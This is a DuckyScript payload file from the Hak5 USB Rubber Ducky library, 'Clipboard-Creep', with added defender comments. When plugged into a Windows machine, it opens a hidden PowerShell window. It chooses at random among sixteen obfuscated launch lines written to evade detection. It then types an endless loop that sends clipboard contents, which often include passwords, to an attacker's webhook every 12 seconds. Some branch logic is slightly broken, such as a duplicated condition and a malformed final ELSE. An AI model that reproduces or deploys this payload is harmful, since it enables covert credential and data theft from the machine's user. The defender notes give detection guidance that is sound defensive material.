hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
REM Clipboard-Creep
REM Version 1.0
REM OS: Windows
REM Author: 0i41E
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM This payload targets the clipboard of the target machine. Define your webhook URL in the payload, then observe the clipboard content on your catching server.
REM Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM Purpose: set $_OS to WINDOWS or NOT_WINDOWS without typing anything, and
REM act as a boot delay by waiting until the host has finished talking to the device.
REM Defender note: this stage sends no keystrokes, so it produces no process or
REM command-line telemetry. What a host can observe here is the USB device
REM enumeration itself, which is where device-connection auditing and USB
REM device-control policy apply.

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
REM #MAX_WAIT is the number of polls and #CHECK_INTERVAL the DELAY (milliseconds)
REM per poll, so the wait is bounded at 150 * 20 = 3000 ms.
REM #WINDOWS_HOST_REQUEST_COUNT is the threshold compared with
REM $_HOST_CONFIGURATION_REQUEST_COUNT below; #NOT_WINDOWS is the default $_OS value.
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

REM Start from NOT_WINDOWS; only the IF below changes it.
$_OS = #NOT_WINDOWS

REM Poll until $_RECEIVED_HOST_LOCK_LED_REPLY becomes TRUE or the tries run out.
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM More configuration requests than the threshold is treated as the Windows signature.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
EXTENSION EXTENSION Rolling_Powershell_Execution
REM VERSION 1.0
REM Author: 0i41E
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection
REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.
REM Summary: $RANDOM_PS is drawn once from $_RANDOM_INT with bounds 1..16 when the
REM extension runs. Rolling_Powershell_Execution() then types the launch line
REM selected by that value, optionally appends an execution-policy switch,
REM presses ENTER and waits #DELAY ms.
REM Defender note: the variants are all meant to end in a PowerShell process
REM started with shortened, mixed-case forms of the no-profile, non-interactive
REM and hidden-window switches. Some use "/" instead of "-", and some are wrapped
REM in cmd.exe, which assembles the program name from environment-variable
REM substrings, caret escapes or a FOR /F loop. Matching on a literal command
REM line misses these. Detection is more robust on the created process image and
REM its parent (process-creation logging such as Windows event 4688 or Sysmon
REM event 1), combined with case-insensitive prefix matching of the switches.

REM CONFIGURATION:
REM Add ExecutionPolicy bypass
REM FALSE here, so the IF_DEFINED_TRUE section in the function is presumably left out.
DEFINE #EXECUTIONPOLICY FALSE
REM Wait after ENTER, in milliseconds.
DEFINE #DELAY 500

$_RANDOM_MIN = 1
$_RANDOM_MAX = 16
VAR $RANDOM_PS = $_RANDOM_INT
FUNCTION Rolling_Powershell_Execution()
REM Types exactly one launch line, chosen by $RANDOM_PS. The value is fixed per
REM run, so repeated calls within one run type the same line.
IF ($RANDOM_PS == 1) THEN
STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
ELSE IF ($RANDOM_PS == 2) THEN
STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 3) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 4) THEN
STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
ELSE IF ($RANDOM_PS == 5) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 6) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
ELSE IF ($RANDOM_PS == 7) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 8) THEN
STRING powershell -NoPro -noninT -win h
ELSE IF ($RANDOM_PS == 9) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
ELSE IF ($RANDOM_PS == 2) THEN
STRING powershell.exe -NoP -nOni -W h
ELSE IF ($RANDOM_PS == 10) THEN
STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
ELSE IF ($RANDOM_PS == 11) THEN
STRING powershell -nopr -noninT -W HiddEn
ELSE IF ($RANDOM_PS == 12) THEN
STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
ELSE IF ($RANDOM_PS == 13) THEN
STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
ELSE IF ($RANDOM_PS == 14) THEN
STRING powershell -noproF -noni -W Hi
ELSE IF ($RANDOM_PS == 15) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
ELSE ($RANDOM_PS == 16) THEN
STRING powershell.exe -noP -nOnI -windo H
END_IF


REM Optional suffix: a space, then one spelling of the execution-policy switch
REM picked from $RANDOM_PS. The first condition that matches wins.
REM Defender note: a bypass value for the execution-policy switch on an
REM interactively launched PowerShell is a signal in its own right, whatever the
REM spelling or case of the switch.
IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE
IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS
ELSE IF (($RANDOM_PS % 5) == 0) THEN
STRING -exec bypass
ELSE IF (($RANDOM_PS % 7) == 0) THEN
STRING -exeC byPasS
ELSE IF (($RANDOM_PS % 10) == 0) THEN
STRING -exEcUtionPoL bYpaSs
ELSE IF (($RANDOM_PS % 12) == 0) THEN
STRING -exEcUtion bYPaSs
ELSE
STRING -eP BYPaSs
END_IF
END_IF_DEFINED
REM Submit the typed line, then give the new process #DELAY ms before further typing.
ENTER
DELAY #DELAY
END_FUNCTION
REM EXAMPLE USAGE AFTER EXTENSION
REM DELAY 2000
REM GUI r
REM DELAY 2000
REM Rolling_Powershell_Execution()
END_EXTENSION
EXTENSION Detect_Finished
REM VERSION 1.0
REM AUTHOR: 0i41E
REM Purpose: signal that the payload has finished by pressing CAPSLOCK several
REM times, #PAUSE ms apart, and then issuing ATTACKMODE OFF.
REM Defender note: a Caps Lock LED that flickers while nobody is typing is a
REM physical indicator users can be taught to report. ATTACKMODE OFF only ends
REM the device's USB emulation; a process the payload started earlier is not
REM touched by this function.

REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
END_REM

REM CONFIGURATION:
REM Gap between CAPSLOCK presses, in milliseconds.
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
REM First branch: four presses when $_CAPSLOCK_ON is FALSE. An even count starting
REM from off leaves Caps Lock off.
IF ($_CAPSLOCK_ON == FALSE)
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
REM Second branch: three presses. An odd count starting from on also leaves Caps Lock off.
ELSE IF
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION
REM Define URL of your catching webhook
REM The value below is a placeholder; every POST typed further down goes to #HOOK.
DEFINE #HOOK "https://example.com/"
REM Define the pause between calls to your webhook.
REM Used as the argument of "sleep -s", so the unit is seconds.
DEFINE #CALLBACK_DELAY 12

REM Main section. On a host detected as Windows it opens the Run dialog, starts
REM PowerShell through Rolling_Powershell_Execution() and types a loop that never
REM exits. Each pass reads the clipboard and POSTs one of three messages to
REM #HOOK: the content when it differs from the previous pass, "hasn't changed"
REM when it is the same, or "is empty". It then sleeps #CALLBACK_DELAY seconds.
REM On any other host it only issues ATTACKMODE OFF.
REM Defender note: the clipboard often holds credentials and other copied
REM secrets, so treat this as credential exposure during response. The loop
REM POSTs on every pass, so it produces outbound HTTPS requests from a PowerShell
REM process at a fixed interval, which is visible to proxy or egress monitoring.
REM With script block logging enabled (event 4104), the Get-Clipboard and irm
REM calls are recorded. The loop keeps running after Detect_Finished() switches
REM the device off, so removing the device does not stop collection; the
REM PowerShell process has to be found and ended. Restricting which USB HID
REM keyboards may attach, and restricting outbound web access for PowerShell,
REM addresses the two ends of this chain.
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 1000
REM randomized and obfuscated way to start powershell
Rolling_Powershell_Execution()
REM Everything between STRINGLN_POWERSHELL and END_STRINGLN is typed into the
REM host as PowerShell text, so no REM lines are placed inside that block.
STRINGLN_POWERSHELL
$e = $null
while ($true)
{
$c = Get-Clipboard
if ($c)
{
if ($c -ne $e)
{
$o = "Clipboard content: $c"
irm -Uri #HOOK -Method POST -Body $o
} else
{
$o = "Clipboard content hasn't changed"
irm -Uri #HOOK -Method POST -Body $o
}
$e = $c
} else
{
$o = "Clipboard is empty"
irm -Uri #HOOK -Method POST -Body $o
}
sleep -s #CALLBACK_DELAY
}
END_STRINGLN
ENTER
DELAY 250
Detect_Finished()
ELSE
ATTACKMODE OFF
END_IF